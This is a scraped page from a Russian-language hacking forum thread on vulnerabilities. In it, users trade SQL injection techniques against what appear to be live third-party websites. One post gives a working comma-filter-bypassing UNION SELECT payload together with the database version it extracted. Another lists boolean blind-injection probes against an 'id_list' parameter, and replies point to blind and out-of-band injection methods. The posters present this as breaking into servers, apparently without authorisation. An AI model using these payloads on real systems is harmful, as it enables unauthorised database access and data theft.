HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 184 из 296 « Первая < 84134174 180 181 182 183 184 185 186 187 188 194234284 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1831  
Старый 07.04.2017, 14:49
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию
Цитата:
Сообщение от DezMond™  
DezMond™ said:

а дальше? какой толк подбирать колонки, если нет вывода?
вывод может и есть, запятая похоже опять фильтруется
 
Ответить с цитированием

  #1832  
Старый 07.04.2017, 15:06
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию
Цитата:
Сообщение от DezMond™  
DezMond™ said:

а дальше? какой толк подбирать колонки, если нет вывода?
Код:
Code:
union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s
5.6.19-67.0-log
 
Ответить с цитированием

  #1833  
Старый 07.04.2017, 19:28
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию
Цитата:
Сообщение от ACat  
ACat said:

mysqli_real_escape_string
а вы как думаете?
Если бы у меня было известное решение, то, наверное, я бы не спрашивал.

В любом случае, спасибо за ответ.
 
Ответить с цитированием

  #1834  
Старый 07.04.2017, 22:55
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию
Цитата:
Сообщение от t0ma5  
t0ma5 said:

Код:
Code:
union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k/**/join/**/(select/**/12)kq/**/join/**/(select/**/13)kz/**/join/**/(select/**/14)kr/**/join/**/(select/**/15)kt/**/join/**/(select/**/16)ky/**/join/**/(select/**/17)ki/**/join/**/(select/**/18)kk/**/join/**/(select/**/19)ko/**/join/**/(select/**/20)ka/**/join/**/(select/**/21)kqq/**/join/**/(select/**/version())kee/**/join/**/(select/**/23)kaa/**/join/**/(select/**/24)kbbb+--+s
5.6.19-67.0-log
ax*eть.

Парни подскажите, если есть иньекция но сервер на генту и не возвращает никаких ошибок как действовать??
 
Ответить с цитированием

  #1835  
Старый 08.04.2017, 04:52
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию
Вернее что бы не быть голословным вот реальный пример:

?id_list=359982' or 1=1 -- 'a --> вывод

?id_list=359982' or 1=2 -- 'a --> 404

?id_list=359982' ORDER BY 1 -- 'a --> 404

?id_list=359982' GROUP BY 1 -- 'a --> 404

Напомню что ошибки не отображаются.

Эни айдиас?
 
Ответить с цитированием

  #1836  
Старый 08.04.2017, 13:46
qqq1457
Guest
Сообщений: n/a
Провел на форуме:
8589

Репутация: 0
По умолчанию
Цитата:
Сообщение от ACat  
ACat said:

Вернее что бы не быть голословным вот реальный пример:
?id_list=359982' or 1=1 -- 'a --> вывод
?id_list=359982' or 1=2 -- 'a --> 404
?id_list=359982' ORDER BY 1 -- 'a --> 404
?id_list=359982' GROUP BY 1 -- 'a --> 404
Напомню что ошибки не отображаются.
Эни айдиас?
это blind sql

Про инекции и Способы обнаружения Blind SQL-инъекций:

https://www.ptsecurity.com/upload/co...-Injection.pdf

софт:/threads/240692/

или ручками крути
 
Ответить с цитированием

  #1837  
Старый 08.04.2017, 15:21
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию
Цитата:
Сообщение от qqq1457  
qqq1457 said:

это blind sql
Про инекции и Способы обнаружения Blind SQL-инъекций:
https://www.ptsecurity.com/upload/co...-Injection.pdf
софт:
/threads/240692/
или ручками крути
да, это я понимаю. но там такой сервер, что блайндом его всё лето можно взламывать
 
Ответить с цитированием

  #1838  
Старый 08.04.2017, 15:22
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Цитата:
Сообщение от ACat  
ACat said:

да, это я понимаю. но там такой сервер, что блайндом его всё лето можно взламывать
Тогда кури в сторону ООБ
 
Ответить с цитированием

  #1839  
Старый 08.04.2017, 18:21
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию
Цитата:
Сообщение от BabaDook  
BabaDook said:

Тогда кури в сторону ООБ
прошу прощения, а что такое ООБ?
 
Ответить с цитированием

  #1840  
Старый 08.04.2017, 20:12
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Цитата:
Сообщение от ACat  
ACat said:

прошу прощения, а что такое ООБ?
http://www.blackhat.com/presentatio...-europe-09-Damele-SQLInjection-whitepaper.pdf

Все подробно и ясно - Page №22
 
Ответить с цитированием
Ответ
Страница 184 из 296 « Первая < 84134174 180 181 182 183 184 185 186 187 188 194234284 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ